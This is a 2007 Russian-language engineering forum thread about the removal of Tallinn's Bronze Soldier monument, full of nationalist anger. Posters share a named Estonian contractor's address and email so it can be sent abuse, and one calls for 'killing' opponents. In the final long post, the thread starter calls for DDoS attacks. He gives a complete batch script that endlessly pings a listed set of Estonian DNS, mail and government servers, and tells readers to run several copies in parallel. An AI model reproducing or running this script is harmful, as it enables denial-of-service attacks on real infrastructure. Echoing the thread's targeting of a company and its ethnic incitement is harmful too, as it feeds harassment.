| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Сообщество > Разное > Нервы в Таллине

Нервы в Таллине

Закрытая тема
Поиск в этой теме
 
Автор темы   Непрочитано 28.04.2007, 18:20
#1
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Я прочитал что непосредственно работы на памятнике "Бронзовый солдат" ведет строительная фирма «Теллинек».
Кто нибудь знает что эта за фирма, очень хочеться им плюнуть в морду.
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 28.04.2007, 18:33
#2
C1


 
Регистрация: 13.06.2005
Сообщений: 314


Цитата:
Сообщение от T-Yoke
Кто нибудь знает что эта за фирма, очень хочеться им плюнуть в морду.
Telinek: AS Telinek, Peterburi tee 46, 11415 Tallinn. Tel: +372 613 9711 Faks: +372 613 9712 E-post: [email protected]
C1 вне форума  
 
Автор темы   Непрочитано 28.04.2007, 18:41
#3
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от C1
Цитата:
Сообщение от T-Yoke
Кто нибудь знает что эта за фирма, очень хочеться им плюнуть в морду.
Telinek: AS Telinek, Peterburi tee 46, 11415 Tallinn. Tel: +372 613 9711 Faks: +372 613 9712 E-post: [email protected]
Спасибо, отправил им на почту. Но боюсь их сайт уже рухнул.
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 28.04.2007, 18:46
#4
C1


 
Регистрация: 13.06.2005
Сообщений: 314


Цитата:
Сообщение от T-Yoke
Но боюсь их сайт уже рухнул.
Да пока не рухнул. Я ведь дал ссылку на их сайт. http://www.telinek.ee/
C1 вне форума  
 
Автор темы   Непрочитано 28.04.2007, 19:29
#5
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от C1
Цитата:
Сообщение от T-Yoke
Но боюсь их сайт уже рухнул.
Да пока не рухнул. Я ведь дал ссылку на их сайт. http://www.telinek.ee/
Действительно живые ещё. Ну пусть знает народ своих "героев". Это их руками был демонтирован памятник Советским солдатам в Таллине.
[ATTACH]1177774105.jpg[/ATTACH]
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 28.04.2007, 19:55
#6
C1


 
Регистрация: 13.06.2005
Сообщений: 314


Тоже странно - что еще жив:
Цитата:
Поздравим эстофашистов с Днем Победы!!!
"Ты не согласен с политикой эстонии??? Ты думаешь, что ты лично не влияешь на ситуацию???
Ты МОЖЕШЬ повлиять на нее в интернете!
http://serfar.livejournal.com/10562.html
C1 вне форума  
 
Автор темы   Непрочитано 28.04.2007, 20:38
#7
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Кстати, судя по видео выложенному в интернете, эстонские полицаи при столкновениях бьют ДУБИНКАМИ ПО ПОЗВОНОЧНИКУ! По этому ребята, которые бьются за памятник, Одевайте на спину рюкзаки с жесткими вставками, и не шею шарфы.
Не имея возможности поддержать делом, тех кто сейчас в Эстонии, хочу помочь в другом. Привожу сообщение выложенное в интернете.
Белорусска Надежда Николаевна Мацкевич обратилась к эстонским антифашистам с просьбой помочь ей предать гласности ее воспоминания о зверствах эстонских эсэсовцев в Белоруссии.

"Я родилась 13.04.1927 г. в Белоруссии, Верхнедвинском районе (ранее Дриссинский), в деревне Долое. Это на границе трех районов: Освитского, Рассонского и Дриссенского. Я очевидец той ужасной войны 1941-1945 годов.

Нашу территорию заняли немцы. Они шли с музыкой, довольные. Им никто не мог оказать сопротивление, только на станции Берковичи был небольшой бой. Оккупанты сразу начали хозяйничать, ловили и убивали курей, свиней и прочую живность. Вскоре был назначен староста и повсюду развешены объявления: "смерть жидам и коммунистам!"

Мой отец и брат 15-ти лет пошли в партизаны. Мать пекла хлеб, а я носила его им. Мне не раз приходилось передавать донесения из отряда в отряд и выполнять задания комиссара Александро-Невского партизанского отряда Первой Дриссенской бригады Василия Ярешева.

В 1942 году каратели особенно зверствовали на нашей территории, грабили, жгли деревни, убивали стариков и детей, а трудовой люд отправляли в Германию, кого в концлагерь, а кого на работы. Немцы зарегистрировали всех евреев и на рукавах сделали им нашивки "Иуда", а коммунистов вешали на центральных площадях районных центров. Я помню, отец привез девочку и мальчика из еврейской семьи, отец которых перед гибелью просил спасти их. Мы некоторое время скрывали их у себя, а потом их отправили на самолёте в тыл. Вообще, многие евреи были спасены таким образом.

В декабре 1943 году я, мать, двое братьев и тетя прятались в лесу близ деревни Ковали, но нас нашли каратели. Они окружили нас в лесу, кричали по русски с акцентом: "стой, никуда не уходить!" Я стояла вдалеке от всех и от страха кинулась в кусты, попала в яму, быстро засыпалась снегом и лежала неподвижно. Я слышала крики, плач родных, затем беспрерывную стрельбу и последний раз голос мамы "Надя, Надя".... Пролежала всю ночь, а утром услышала: "Есть кто живой?" Это был старичок из деревни Каркальцы, который потом рассказал, что всех наших расстреляли каратели из Эстонии. Затем меня снова схватили и направили в Полоцкую тюрьму в лагерь №367".

После полоцкой тюрьмы, в 1944 году группу арестантов вместе с Надеждой Николаевной привезли в Эстонию в Тарту, откуда всех погнали в Таллин, используя в качестве живого щита от наступавших советских войск. Фашисты хотели отправить пленных на пароходе в Германию, но не успели - по дороге в Таллин пленных освободили советские войска. Она хорошо помнит специфический акцент и первые слова на языке, на котором говорили люди, гнавшие в плен: "Рутту, рутту, курат!..." (Быстро, быстро, чёрт! перевод с эстонского, ИА REGNUM).
-----------------------------------------------------------------------------------
Моя мама, тоже была под немцами на Украине, вовремя войны и её рассказы практически полностью это все подтверждают. Так что я считаю все вышизложенное моей личной точкой зрения. Всем счастья и с наступающим праздником Днем Победы над фашизмом.
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 29.04.2007, 00:53
#8
Perezz!!
Moderator

архитектор
 
Регистрация: 21.08.2003
Москва
Сообщений: 3,587


Ребят ну у нас форум не политический. Понятно что многие вещи нас всех волнуют сильно и как правило кому то только этого и надо и от этого ни куда не денешься. Я пока не закрываю тему, но очень рассчитываю на вашу дипломатичность и политкорректность. И ещё раз обращаю ваше внимание на то что провокации бывают не только в семье и на работе. И поддаваться на провокации, я как психолог вдобавок, рекомендую только на сексуальные.
Perezz!! вне форума  
 
Автор темы   Непрочитано 29.04.2007, 02:59
#9
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от Perezz!!
Ребят ну у нас форум не политический. Понятно что многие вещи нас всех волнуют сильно и как правило кому то только этого и надо и от этого ни куда не денешься. Я пока не закрываю тему, но очень рассчитываю на вашу дипломатичность и политкорректность. И ещё раз обращаю ваше внимание на то что провокации бывают не только в семье и на работе. И поддаваться на провокации, я как психолог вдобавок, рекомендую только на сексуальные.
Извини Perezz!!
Я сам всегда отделял мух от котлет. И старался политикой не заниматься. По этому этот пост последний на эту тему.
В предверии большого праздника, я хочу отдать долг памяти тем кто лежит в той самой могиле в Таллине, кого закрывал своим телом демонтированный бронзовый солдат, сведения о которых представлены Министерством Обороны России.
Вот их имена:
1. БРЯНЦЕВ АЛЕКСЕЙ МАТВЕЕВИЧ, 1917 г. р., капитан, парторг 1222-го самоходно-артиллерийского полка, уроженец Алтайского края Поспелихинского района, с. Сорки, призван Георгиевским РВК, убит 22.09.44. Жена, Мария Петровна, проживала в Ставропольском крае, г. Георгиевск.

2. БЕЛОВ ДМИТРИЙ АНДРЕЕВИЧ, разведчик 23-й артиллерийской дивизии, ефрейтор.

3. ВАРШАВСКАЯ ЕЛЕНА МИХАЙЛОВНА (ЛЕНИНА МОИСЕЕВНА), 1925 г. р., старшина медслужбы, фельдшер дивизиона 40-го гвардейского минометного полка, уроженка Полтавской обл. Диканьского района, с. Михайловка, призвана Дзержинским РВК г. Москвы, погибла 23.09.44. Отец, Варшавский Моисей Михайлович, проживал в г. Москве, Театральный проезд, 1/7, кв. 9.

4. ВОЛКОВ ВАСИЛИЙ ЕГОРОВИЧ, 1923 г. р., лейтенант, командир минометного взвода 657-го стрелкового полка 125-й стрелковой дивизии, уроженец Калининской обл. Калининского района, д. Б. Макарово, призван Калининским РВК, убит 22.09.44. Мать, Волкова Варвара Дмитриевна, проживала по месту рождения учтенного.

5. ДАВЫДОВ ВАСИЛИЙ ИВАНОВИЧ, 1915 г. р., гвардии сержант, командир орудия 30-го гвардейского минометного полка, уроженец Калининской обл. Ржевского района, с. Адорье, призван Фокинским РВК Молотовской обл., погиб 22.09.44. Жена, Давыдова Наталия Васильевна, проживала: Молотовская (ныне Пермская) обл., Фокинский район, Фокинский с/с, с. Фоки. Ныне это село (почтовый индекс 617750) относится к администрации г. Чайковский.

6. КОЛЕСНИКОВ КОНСТАНТИН ПАВЛОВИЧ, 1897 г. р., полковник, заместитель командира 125-й стрелковой дивизии, уроженец Сталинградской обл., х. Жилая Коса, убит 21.09.44. Жена, Колесникова Мария Алексеевна, проживала: Краснодарский край, Кореновский район, станица Платоновская, ул. Кооперативная, 1. Для справки: в Краснодарском крае нет станицы Платоновская, но в Кореновском районе этого края есть станица Платнировская (почтовый индекс 353178), вероятно, в данные картотеки учета офицерского состава вкралась ошибка.

7. КОТЕЛЬНИКОВ, подполковник (сведений нет).

8. КУЗНЕЦОВ ВАСИЛИЙ ИВАНОВИЧ, 1908 г. р., гвардии майор, командир 1222-го самоходно-артиллерийского полка, уроженец Ивановской обл. Кольчугинского района, д. Ново-Фроловское, убит 22.09.44. Жена, Кузнецова Мария Николаевна, проживала по месту рождения учтенного. Для справки: ныне Кольчугинский район входит в состав Владимирской области.

9. КУЛИКОВ МИХАИЛ ПЕТРОВИЧ, 1909 г. р., подполковник, командир 657-го специального полка 125-й стрелковой дивизии, уроженец Тамбовской обл., г. Моршанск, убит 22.09.44. Жена, Куликова Зинаида Андреевна, проживала в г. Ташкенте.

10. ЛУКАНОВ И. М, лейтенант (сведений нет).

11. СЕРКОВ ИВАН СТЕПАНОВИЧ, 1922 г. р., капитан, начальник разведки 79-й легкоартиллерийской бригады, уроженец Рязанской обл. Путятинского района, призван Рязанским РВК, убит 21.09.44. Отец, Серков Степан Михайлович, проживал: г. Рязань, ул. Свободы, 22.

12. СЫСОЕВ ИВАН МИХАЙЛОВИЧ, 1909 г. р., капитан, парторг 657-го специального полка 125-й стрелковой дивизии, уроженец Архангельской области Виноградовского района, д. Топса, убит 22.09.44. Жена, Сысоева Лидия Семеновна, проживала: Архангельская обл., Виноградовский р-н, д. Леонтьевская.

13. ХАПИКАЛО СТЕПАН ИЛЛАРИОНОВИЧ, 1920 г. р., гвардии старший сержант, командир орудия 26-го отдельного гвардейского тяжелого танкового полка, уроженец Полтавской обл., Ново-Сенжарского района, с. Ново-Полтава, призван Лозно-Александровским РВК (так в документе) Ворошиловградской обл., умер от ран 28.09.44 в госпитале ТППГ-2623
Вечная память!
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 29.04.2007, 06:14
#10
Profan


 
Регистрация: 25.12.2005
Москва
Сообщений: 13,627


А с могилой-то что будет? Перезахоронить бы останки в Росии и новый памятник установить. А может, сразу надо было перенести все вместе с памятником к нам?
Profan вне форума  
 
Непрочитано 29.04.2007, 09:49
#11
Sopro

Конструктор-машиностроитель
 
Регистрация: 22.12.2005
С.-Петербург
Сообщений: 1,224
<phrase 1=


Цитата:
Сообщение от Profan
А с могилой-то что будет? Перезахоронить бы останки в Росии и новый памятник установить. А может, сразу надо было перенести все вместе с памятником к нам?
Вот это правильно. Давно надо было и не было бы гнилого базара. Погибшим все равно, а нынешним живым и здравствующим политикам-космополитам не было бы повода ради своего политического капитала посылать наивную и легковерную молодежь под полицейские дубинки.
__________________
Счастлив тот, чьи беззакония прощены и чьи грехи покрыты (Рим. 4:7)
Sopro вне форума  
 
Автор темы   Непрочитано 29.04.2007, 10:18
#12
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от Profan
А с могилой-то что будет? Перезахоронить бы останки в Росии и новый памятник установить. А может, сразу надо было перенести все вместе с памятником к нам?
Да если по людски делать, то так и надо было бы.
Во всем мире, при любых религиозных конфессиях, могилы это очень деликатная тема, и прежде чем копать, да разрушать. Сто раз отмерить надо. А делать из этого политический цирк, вообще не допустимо.
Даже при всех натяжках, кроме как хорошо продуманой провокацией, призванной выставить русскоязычое население Эстониии, как пьяниц, матерщинников, наркоманов, малолетних дебилов, хулиганов и погромщиков, ничем другим это назвать нельзя.
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 29.04.2007, 10:19
#13
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,968


Надо было сразу перенести памятник на территорию России, как только начались разговоры о переносе.
Ну а с фирмой Telinek надеюсь, никто из Россиян больше работать не будет.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 29.04.2007, 10:45
#14
ВасилиМордыхаевичСруленко


 
Сообщений: n/a


Цитата:
Сообщение от DEM
Надо было сразу перенести памятник на территорию России, как только начались разговоры о переносе.
Ну а с фирмой Telinek надеюсь, никто из Россиян больше работать не будет.
А чем вам фирма то насолила !? Симптичный дядька на их сайте, на Бени Хилла похож. Они вроде аккуратно все делают - голову не отшибли и в металлолом не сдали: это не снос, а перенос памятника - там у них целый комплекс жертвам ВОВ запланирован. И вообще юридически это вопрос между родственниками (героев) и мэрией Таллина, а никак не "Наших" и трпр... (кстати они предлагали России этот памятник и останки) Тем более эстонцы тут в своем праве, затея им помешать заведомо проигрышная, а покупать кефир или нет - личное дело каждого.
 
 
Непрочитано 29.04.2007, 10:53
#15
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,968


ВасилиМордыхаевичСруленко
Да что ты говоришь Б_я, а может мы теперь им спасибо скажем.
Мочить уродов надо .......
Ыстонские шпроты и ЁЙгурты ф топку, они там похоже ничего и делать то не могут.
Под держим нашего производителя.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 29.04.2007, 11:04
#16
DEM

YngIngKllr
 
Регистрация: 29.03.2005
СПб
Сообщений: 12,968


Интересно есть на форуме кто из Талина.
__________________
Работаю за еду.
Working for food.
Für Essen arbeiten.
العمل من أجل الغذاء
Працую за їжу.
DEM вне форума  
 
Непрочитано 29.04.2007, 11:07
#17
Аshаs-ка

проектировсчик
 
Регистрация: 06.01.2006
Москва
Сообщений: 1,982


И если есть, пусть расскажет, что и как. В наше время средства массового оболванивания что хошь покажут... очевидцев давай! Вопросов-то много. Что, например, граждане России на ночных улицах Таллина делают...
Аshаs-ка вне форума  
 
Непрочитано 29.04.2007, 11:23
#18
ВасилиМордыхаевичСруленко


 
Сообщений: n/a


Цитата:
Сообщение от DEM
Идея изначально была благая. Перенести все монументы на специальное охраняемое клабище, чтобы местные националисты не могли их осквернять. Планировалось также восстановить таблички (отбитые в начале 90-х) и благоустроить территорию. Кстати в других странах восточной Европы (кроме дружественной Белоруссии и незападной Украины) памятники давно по большей части ликвидировали или изуродовали (сво-ло-чи), а эстонцы просто самые последние (и не самые плохие).
 
 
Автор темы   Непрочитано 29.04.2007, 11:29
#19
T-Yoke

Артиллерист - вертолётчик. Дипломированный инженер-механик. Technologist
 
Регистрация: 29.11.2004
Где-то около Москвы
Сообщений: 16,527
Отправить сообщение для T-Yoke с помощью Skype™


Цитата:
Сообщение от DEM
ВасилиМордыхаевичСруленко
Да что ты говоришь Б_я, а может мы теперь им спасибо скажем.
Мочить уродов надо .......
Ыстонские шпроты и ЁЙгурты ф топку, они там похоже ничего и делать то не могут.
Под держим нашего производителя.
DEM ты главное, на провокации не поддавайся, я так понял, это и есть главная задумка организаторов всего этого действа.
Надо спокойненько, составить список эстонских товаров и планомерно отслеживать что мы покупаем.
А по возможности сыпать этим рас3,14здяям соль на раны в виде, DDOSовских атак их эстонских серверов.
Раз они такие, будем и мы с ними так же. Хотя лично я знавал некоторых прибалтийцев, вполне вменяемые люди. Значит не все там идиоты, есть надежда на лучшее. А пока предлагаю поддержать наших вот таким способом (извини Perezz!!, я обещал не ввязыватся, но плохо получается). Создать текстовый файл, который периодически пингует (загружает запросами, приводит к перегрузке и остановке работы) все последовательно написанные эстонские DNS и MAIL сервера. Цикл бесконечен :). Список можете дополнить. Файл может называться по любому, но раширение обязательно такое PriveteSStonia.BAT
Далее Пуск->Выполнить->PriveteSStonia.BAT и можно запустить несколько параллельных окон. Всех с Праздниками.
-----------------------------------------------------------------
@echo off
SET PING_COUNT=50
SET PING_TOMEOUT=1000
:PING
echo Pinguem estonskie servera
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% dns.estpak.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.126.115.18
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.56.245
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.133.222
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.online.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.106.96.21
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uninet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.1
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.ut.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.99
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uu.net
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 137.39.1.3
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% sunic.sunet.se
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 192.36.125.2
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% muheleja.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.132
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.eenet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.12
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% smtp.uninet.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.4
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ptah.kbfi.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.gov.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.106.241
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.aso.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.96.222
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.ut.ee
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.76
ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% mail.gov.ee
GOTO PING
------------------------------------------------------------------------------
__________________
«Артиллерия не токмо грохот, но и наука!» Пётр I
T-Yoke вне форума  
 
Непрочитано 29.04.2007, 11:42
#20
Alxd

Нач. отдела САПР
 
Регистрация: 14.05.2004
Тюмень
Сообщений: 466
<phrase 1=


Эх... пингуются... Значит живы исчо. Абыдно.
Alxd вне форума  
Закрытая тема
Вернуться   Форум DWG.RU > Сообщество > Разное > Нервы в Таллине

Размещение рекламы